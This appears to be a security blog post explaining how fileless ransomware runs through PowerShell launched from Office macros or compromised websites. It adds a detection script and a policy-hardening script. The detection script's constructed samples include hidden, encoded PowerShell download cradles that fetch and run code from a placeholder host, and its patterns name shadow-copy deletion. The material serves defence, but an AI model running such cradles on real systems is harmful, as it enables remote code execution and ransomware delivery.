Fileless Ransomware Infections – How Does This Really Work?

This is part three of five in a series on Ransomware that will discuss a new variation of ransomware (known as fileless ransomware), the most targeted verticals, how it works and what IT executives and administrators need to know to combat the ever-changing strains of ransomware.

There is a newer variant of ransomware that is stealthy, hard to detect with traditional file-scanning antivirus, and is pushing more banks, telecommunication companies, government agencies and healthcare organizations globally to pay ransoms to cyber criminals. These attacks are known as fileless or non-malware ransomware. Rather than dropping an executable on disk, they abuse Microsoft's PowerShell scripting language, most often launched by a macro inside an Office document, to run the encryption payload directly in memory.

What is PowerShell?

PowerShell is Microsoft's command-line shell and scripting language for automating administration of Windows. It ships with hundreds of built-in commands (cmdlets), and because powershell.exe is signed by Microsoft and present on every modern Windows installation, attackers treat it as a ready-made, trusted interpreter for their own code.

How does Fileless Ransomware Work with PowerShell?

Non-malware, aka fileless ransomware, differs from traditional ransomware in that it does not drop a malicious executable on disk for antivirus to scan. Instead, a script or Office macro launches powershell.exe (a legitimate, Microsoft-signed binary) with the encryption logic passed on the command line, encoded as an argument, or downloaded straight into memory, and that PowerShell code is what encrypts the files.

There are two common ways fileless ransomware penetrates your systems:

Via Phishing Attacks: A user opens an email attachment, typically an Office document, and enables macros. The macro launches PowerShell in memory on the Windows device (laptop, desktop or server), usually with a hidden window and an encoded or downloaded command. That PowerShell code encrypts the data on the device and on any reachable network shares and then displays the ransom note with payment instructions.

Via Compromised Websites: An employee visits a compromised or malicious website that serves an exploit kit or a malicious script. The attacker's code runs in the memory of the browser or a helper process, launches PowerShell without writing an executable to disk, and either first collects information about the machine or immediately encrypts files and demands cryptocurrency.
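The launch chain described above, viewed from the defender's side, as an added example that is not from the original post: a PowerShell function that scores a process command line (the CommandLine and ParentImage fields of Sysmon Event ID 1 or Security Event ID 4688, or the script text from PowerShell Event ID 4104) for the indicators a macro- or browser-launched fileless payload typically shows, and decodes an -EncodedCommand argument so the hidden download cradle becomes readable. The sample command lines, parent process paths and the example.invalid URL are constructed for the demonstration; the function names are my own.

```powershell
# Added example (not from the original post). Scores a PowerShell launch for the
# indicators fileless ransomware delivered by macros or drive-by pages tends to show.
# Inputs here are CONSTRUCTED samples; in production, feed it the CommandLine and
# ParentImage fields of Sysmon Event ID 1 (or Security 4688) or the script text from
# Microsoft-Windows-PowerShell/Operational Event ID 4104.

function Get-DecodedCommand {
    param([string]$CommandLine)
    # -EncodedCommand / -enc / -e carries the script as Base64 of UTF-16LE text
    if ($CommandLine -match '(?i)-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
        catch { return $null }
    }
    return $null
}

function Test-SuspiciousPowerShell {
    param([string]$CommandLine, [string]$ParentImage = '')
    $decoded = Get-DecodedCommand -CommandLine $CommandLine
    # Match against the visible command line plus the decoded payload, if any
    $text = if ($decoded) { "$CommandLine`n$decoded" } else { $CommandLine }

    $indicators = @()
    # PowerShell spawned by an Office application or a browser is the macro / drive-by chain itself
    if ($ParentImage -match '(?i)\\(winword|excel|powerpnt|outlook|iexplore|chrome|firefox|msedge)\.exe$') {
        $indicators += "parent=$(Split-Path $ParentImage -Leaf)"
    }
    $patterns = [ordered]@{
        'hidden window'      = '(?i)-w\w*\s+hidden'
        'no profile'         = '(?i)-nop(?:rofile)?\b'
        'policy bypass'      = '(?i)-e\w*\s+bypass'
        'encoded command'    = '(?i)-(?:e|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}'
        'download cradle'    = '(?i)DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient'
        'in-memory exec'     = '(?i)\bIEX\b|Invoke-Expression|\[Reflection\.Assembly\]::Load'
        'crypto API use'     = '(?i)System\.Security\.Cryptography|AesCryptoServiceProvider|RijndaelManaged|CreateEncryptor'
        'shadow copy delete' = '(?i)vssadmin.*delete\s+shadows|shadowcopy\s+delete'
    }
    foreach ($name in $patterns.Keys) {
        if ($text -match $patterns[$name]) { $indicators += $name }
    }
    [pscustomobject]@{
        Score       = $indicators.Count
        Indicators  = ($indicators -join ', ')
        Decoded     = $decoded
        CommandLine = $CommandLine
    }
}

# Constructed samples: a benign admin command, a Word-macro-style launch, and a
# browser-spawned encoded download cradle (the cradle text is built here, not captured)
$cradle  = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cradle))
$samples = @(
    @{ Parent = 'C:\Windows\System32\cmd.exe'
       Cmd    = 'powershell.exe -Command "Get-Service | Where-Object Status -eq Running"' }
    @{ Parent = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
       Cmd    = 'powershell.exe -nop -w hidden -ep bypass -c "$c=New-Object Net.WebClient;$c.DownloadString(''http://example.invalid/a.ps1'')|IEX"' }
    @{ Parent = 'C:\Program Files\Google\Chrome\Application\chrome.exe'
       Cmd    = "powershell.exe -NoP -NonI -W Hidden -Enc $encoded" }
)
$samples |
    ForEach-Object { Test-SuspiciousPowerShell -CommandLine $_.Cmd -ParentImage $_.Parent } |
    Sort-Object Score -Descending |
    Format-List Score, Indicators, Decoded
```

With these samples the benign cmd.exe-launched command scores 0, while the Word-launched and Chrome-launched lines each score 6, and the Chrome case shows the decoded cradle that was invisible in the raw command line. The indicator list is deliberately behavioural rather than signature-based: none of the patterns depend on a file hash, which is the whole point when there is no file.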

Why is fileless ransomware unique?

Fileless malware is hard to detect because the malicious code either lives inside a document or script written in a native scripting language (VBA, JavaScript, PowerShell) or is loaded straight into the memory of a legitimate process such as powershell.exe. No new executable is written to disk, so file-scanning antivirus and disk-based forensics have little to examine. Note that "fileless" is relative: the initial document or script usually does exist, and many strains persist through the registry, WMI subscriptions or scheduled tasks rather than through files on the hard drive.

What are the problems associated with Fileless Ransomware?

  1. Fileless ransomware leaves little on disk, so antivirus that relies on scanning files for known signatures generally does not see it. Detection has to come from behaviour and from PowerShell's own telemetry (script block logging, AMSI integration, process-creation auditing) rather than from a file scan.
  2. This strain gives cyber criminals a foothold on your systems: they can infiltrate your computers, steal your information and encrypt your files without your IT staff knowing, because nothing unusual appears on disk.
  3. It can lead to more attacks. The same PowerShell foothold used to run the encryption can also collect as much data as possible from the victim's computer and network and send it out, so an infection is frequently also a data breach and a starting point for the next intrusion.

What can end users do to protect themselves?

  1. BACKUP YOUR DATA. Back up regularly, keep at least one copy offline or otherwise unreachable from the network (ransomware encrypts any share it can write to), and test restores so you can roll back to a point in time before your systems were infected.
  2. BE VIGILANT. Disable macros by policy (Office can block macros in documents that came from the internet, or allow only digitally signed macros) rather than relying on each user to judge whether a file is malicious. Do not open unexpected attachments, and if there is any cause for concern, contact your MSP or IT administrator immediately.
  3. BLOCK AND LOG. Filter email attachments and web traffic at the gateway, and turn on PowerShell script block logging and process-creation auditing so that a hidden, encoded PowerShell launch from Word or a browser is recorded and can be alerted on. Since the cybercriminals deliver their code through email and web pages, block anything that is odd, unfamiliar or unexpected.
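Added example, not from the original post: a PowerShell script that audits, and with -Apply sets, the Office macro policy and PowerShell script block logging settings behind the recommendations above. The registry paths are Microsoft's documented policy locations for Office 2016 and later (version key 16.0) and for Windows PowerShell; the function names are my own. The HKLM setting needs an elevated prompt, and in a domain the same values belong in Group Policy rather than in a per-machine script.

```powershell
# Added example (not from the original post). Reports, and with -Apply sets, the
# registry-backed policies that close the macro -> PowerShell chain and make what
# PowerShell runs visible. Paths are Microsoft's documented policy locations for
# Office 2016+ (version key 16.0) and Windows PowerShell; function names are mine.
# HKLM settings need an elevated prompt; in a domain, deploy the same values via GPO.

function Get-HardeningBaseline {
    $items = foreach ($app in 'Word', 'Excel', 'PowerPoint') {
        $key = "HKCU:\Software\Policies\Microsoft\Office\16.0\$app\Security"
        # VBAWarnings: 4 = disable all macros without notification,
        #              3 = allow only digitally signed macros (pick 3 if signed internal macros are needed)
        [pscustomobject]@{ Path = $key; Name = 'VBAWarnings'; Value = 4 }
        # Block macros in files carrying the Mark-of-the-Web (downloads, email attachments)
        [pscustomobject]@{ Path = $key; Name = 'blockcontentexecutionfrominternet'; Value = 1 }
    }
    # Script block logging writes the de-obfuscated script text to
    # Microsoft-Windows-PowerShell/Operational as Event ID 4104, which is the
    # telemetry that makes memory-only PowerShell activity observable.
    $items += [pscustomobject]@{
        Path  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
        Name  = 'EnableScriptBlockLogging'
        Value = 1
    }
    return $items
}

function Test-Hardening {
    param([switch]$Apply)
    foreach ($item in Get-HardeningBaseline) {
        $current = $null
        if (Test-Path -Path $item.Path) {
            $current = (Get-ItemProperty -Path $item.Path -Name $item.Name -ErrorAction SilentlyContinue).($item.Name)
        }
        $ok = ($current -eq $item.Value)
        if (-not $ok -and $Apply) {
            # Policy keys usually do not exist until a policy has been set; create them on demand
            if (-not (Test-Path -Path $item.Path)) { New-Item -Path $item.Path -Force | Out-Null }
            Set-ItemProperty -Path $item.Path -Name $item.Name -Value $item.Value -Type DWord
            $current = $item.Value
            $ok = $true
        }
        $status = if ($ok) { 'OK' } else { 'NOT SET' }
        [pscustomobject]@{
            Setting  = "$($item.Path)\$($item.Name)"
            Expected = $item.Value
            Current  = $current
            Status   = $status
        }
    }
}

# Report only; run "Test-Hardening -Apply" from an elevated prompt to enforce.
Test-Hardening | Format-Table Status, Setting, Expected, Current -AutoSize
```

Run it as-is to see which of the settings are missing on a machine; rerun with -Apply to set them. The macro keys are per-user (HKCU), so on a shared machine each profile needs them, which is another reason to push them through Group Policy in production.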

Interested in learning how to keep your networks and systems protected against ransomware threats?

